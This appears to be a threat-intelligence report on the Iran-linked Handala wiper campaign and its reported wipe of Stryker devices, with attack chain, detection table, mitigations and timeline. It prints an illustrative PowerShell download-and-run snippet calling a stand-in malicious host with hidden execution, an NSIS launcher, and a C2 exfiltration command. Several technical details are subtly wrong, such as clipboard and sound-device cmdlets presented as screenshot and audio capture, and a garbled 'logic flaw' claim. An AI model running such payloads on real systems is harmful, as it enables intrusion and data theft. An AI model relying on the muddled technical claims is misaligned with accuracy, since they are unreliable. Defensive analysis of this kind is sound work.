Handala Hack: Unveiling the Modus Operandi of a State‑Backed Wiper
Executive Summary
The Handala Hack, also known as Void Manticore or Storm‑0842, is a sophisticated, state‑backed cyber‑campaign originating from Iran. Using a multi‑stage malware chain that masquerades as legitimate software, the group leverages Microsoft Intune administrative privileges to issue remote wipe commands, while exfiltrating data via AWS S3 and Storj buckets. The attack on Stryker Corp. on 11 March 2026, which wiped more than 200 000 devices and exfiltrated ~50 TB of data, demonstrates the destructive potential of this threat. Immediate actions include tightening Intune admin controls, enforcing MFA, blocking Telegram C2 traffic, and deploying EDR solutions that detect PowerShell‑based persistence and file‑deletion activity.
Technical Analysis
1. Root Cause and Vulnerability Mechanics
The Handala attack does not hinge on a single software flaw but exploits a combination of privileged access, misconfigurations, and malicious code design:
| Component | Root Cause | Impact |
|---|---|---|
| Microsoft Intune Admin Rights | Lack of least‑privilege enforcement and absence of MFA on admin accounts | Enables attackers to issue a global remote‑wipe command |
| PowerShell Execution | The first‑stage payload invokes PowerShell scripts that exclude critical directories and hide execution traces | Bypasses basic AV and EDR detection |
| Extension‑less NSIS Installers | Malicious installers omit the .exe extension, evading proxy and file‑type signature checks | Allows the installer to be downloaded and executed without raising alerts |
| Telegram C2 Channels | Telegram’s end‑to‑end encryption and widespread use make it a low‑visibility C2 medium | Provides a resilient command channel that is hard to block without collateral damage |
The combination of these factors creates a logic flaw in the overall attack chain: the malware assumes that an Intune admin will trust the device’s local configuration and that the device will accept a remote wipe command without additional verification.
2. Step‑by‑Step Exploitation Chain
Initial Access – Phishing / Social Engineering
- Victims receive an email or message that appears to be from a trusted source (e.g., a tech support or a popular messaging app).
- The attachment or link contains a malicious installer disguised as Pictory, KeePass, WhatsApp, or Telegram.
- The installer is an extension‑less NSIS binary that bypasses standard file‑type checks.
Execution – PowerShell Payload
- The installer launches a PowerShell script (
Invoke-Expression) that performs the following:- Excludes system directories (
C:\Windows,C:\Program Files) from scanning. - Loads a secondary payload from a remote URL.
- Hides execution by setting the
Hiddenproperty and clearing console output.
# Sample PowerShell execution (illustrative)
$url = "https://malicious.example.com/secondstage.ps1"
Invoke-WebRequest -Uri $url -OutFile "$env:TEMP\secondstage.ps1"
Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -File $env:TEMP\secondstage.ps1" -WindowStyle Hidden
- Excludes system directories (
- The installer launches a PowerShell script (
Persistence – Telegram Bot C2
- The second‑stage payload establishes a TCP/HTTPS connection to a Telegram bot API endpoint.
- Commands are received via JSON payloads, enabling the attacker to instruct the malware to:
- Capture screenshots and audio (
Get-Clipboard,Get-WmiObject -Class Win32_SoundDevice). - Enumerate files and directories (
Get-ChildItem). - Compress data (
Compress-Archive). - Delete files (
Remove-Itemwith-Recurse).
- Capture screenshots and audio (
Privilege Escalation – Intune Remote Wipe
- The malware authenticates to Azure AD using compromised Intune admin credentials or stolen tokens.
- It issues a
deviceManagement/managedDevices/{id}/wipeAPI call, which triggers a remote wipe on all enrolled devices. - The wipe command is broadcast to every device in the tenant, regardless of user consent.
Exfiltration – Cloud Storage
- Compressed data is uploaded to pre‑configured AWS S3 and Storj buckets.
- The upload is performed via signed URLs or SDK calls, often using minimal headers to avoid detection.
Defacement – Entra Login Page
- Before or during the wipe, the malware modifies the Microsoft Entra (Azure AD) login page, replacing the default logo with the Handala symbol.
- This serves both as a psychological weapon and a confirmation of successful compromise.
Destruction – Data Erasure
- The Intune wipe command permanently erases data on Windows laptops, mobile devices, and servers.
- The malware also performs local file deletion to reduce forensic footprints.
3. Code and Payload Examples
While no public samples were released, the following snippets illustrate the techniques reported by Check Point Research and the FBI:
Extension‑less NSIS Installer (Illustrative)
; NSIS script without .exe extension
OutFile "malicious"
InstallDir "$TEMP"
Section
ExecShell "open" "powershell.exe" "-NoProfile -ExecutionPolicy Bypass -File $TEMP\secondstage.ps1"
SectionEnd
Telegram Bot Command Payload
{
"command": "exfiltrate",
"parameters": {
"target": "C:\\Users\\*\\Documents",
"bucket": "s3://handala-exfil"
}
}
Impact Assessment
| Metric | Value |
|---|---|
| Systems Wiped | >200 000 devices (Windows laptops, mobile devices, servers) |
| Data Exfiltrated | ~50 TB |
| Geographic Reach | 79 countries (Stryker’s operations) |
| Primary Target | Technology, IT, government, defense, critical infrastructure, energy, education, finance |
| Notable Incident | Stryker Corp. global wipe on 11 March 2026 |
The Handala attack is comparable to the Wiper campaigns of 2017 (e.g., Wiper used by the Lazarus Group) in terms of destructive intent, but it uniquely leverages cloud‑native management platforms (Intune) and modern messaging apps (Telegram) for C2. The use of AWS S3 and Storj for exfiltration mirrors the Spearphishing Attachment technique used by the Cobalt Group in 2024, but the scale of data loss is unprecedented for a single operation.
Detection & Response
| Indicator | Source | Detection Method |
|---|---|---|
| PowerShell execution with hidden window | Windows Event ID 4104 (PowerShell) | EDR rule for -WindowStyle Hidden |
| Unusual Intune wipe requests | Azure AD audit logs | Alert on deviceManagement/managedDevices/{id}/wipe |
| Outbound traffic to Telegram domains | DNS logs | Block or flag t.me, api.telegram.org |
| Upload to AWS S3/Storj buckets | CloudTrail, S3 access logs | Flag large multipart uploads from internal IPs |
| Defacement of Entra login page | Web server logs | Alert on changes to /login assets |
| File deletion patterns | EDR file‑system monitoring | Alert on mass Remove-Item operations |
YARA Rule Example (PowerShell Detection)
rule PowerShell_Hidden_Execution
{
meta:
description = "Detects PowerShell launched with Hidden window style"
strings:
$hidden = /-WindowStyle Hidden/
condition:
$hidden
}
Mitigation & Remediation
Restrict Intune Admin Privileges
- Enforce least‑privilege: limit the number of accounts with
Global AdministratororIntune Administratorroles. - Require MFA for all privileged accounts.
- Audit Intune wipe logs; set alerts for mass wipe events.
- Enforce least‑privilege: limit the number of accounts with
Secure PowerShell
- Enable PowerShell logging (
Set-ItemProperty HKLM:\Software\Policies\Microsoft\Windows\PowerShell\EnableScriptBlockLogging -Type DWord -Value 1). - Deploy EDR solutions that flag hidden PowerShell processes and directory exclusion patterns.
- Enable PowerShell logging (
Block Telegram C2 Traffic
- Use outbound filtering to block
api.telegram.organdt.medomains. - Implement a web proxy that inspects HTTPS traffic for Telegram bot API calls.
- Use outbound filtering to block
Monitor Cloud Exfiltration
- Deploy CASB to monitor AWS S3 and Storj bucket activity.
- Enforce data loss prevention (DLP) policies on large file uploads.
Defacement Prevention
- Harden Azure AD login pages: enable custom branding only through approved channels.
- Use web application firewalls (WAF) to detect unauthorized changes to login assets.
Incident Response Playbook
- Immediately isolate affected devices.
- Verify Intune wipe commands in Azure AD logs.
- Conduct forensic imaging before wiping to preserve evidence.
- Coordinate with Microsoft Support for recovery of Intune configurations.
Timeline
| Date | Event |
|---|---|
| Mid‑2022 | Homeland Justice persona established for multiple attacks |
| July 2024 | Wiper campaign hashes released |
| September 2024 | Seyed Yahya Hosseini Panjaki sanctioned by U.S. Treasury |
| Late 2025 | Expansion to U.S., Gulf states, and Western institutions |
| January 2026 | Iranian internet blackout; Starlink IP ranges observed |
| 28 Feb 2026 | U.S.–Israeli Operation Epic Fury strikes; escalation of Handala activity |
| 11 Mar 2026 | Stryker Corporation suffers global wipe and data exfiltration |
Sources & References
- Check Point Research. “Handala Hack – Unveiling Group’s Modus Operandi.” 2026. https://research.checkpoint.com/2026/handala-hack-unveiling-groups-modus-operandi/
- Marc‑Frederic Gomez. “INTELLIGENCE REPORT — HANDALA / HANDALA HACK TEAM.” 2026. https://blog.marcfredericgomez.com/intelligence-report-handala-handala-hack-team/
- Infosecurity Magazine. “Handala Group Tied to Iranian Hack‑and‑Leak Operations, FBI Reveals.” 2026. https://www.infosecurity-magazine.com/news/handala-group-iranian-hack-and/
- The Cyber Express. “Who Is Handala – The Iran‑Linked Ghost Group That Just Wiped 200K Systems.” 2026. https://thecyberexpress.com/who-is-handala-hackers-in-stryker-cyberattack/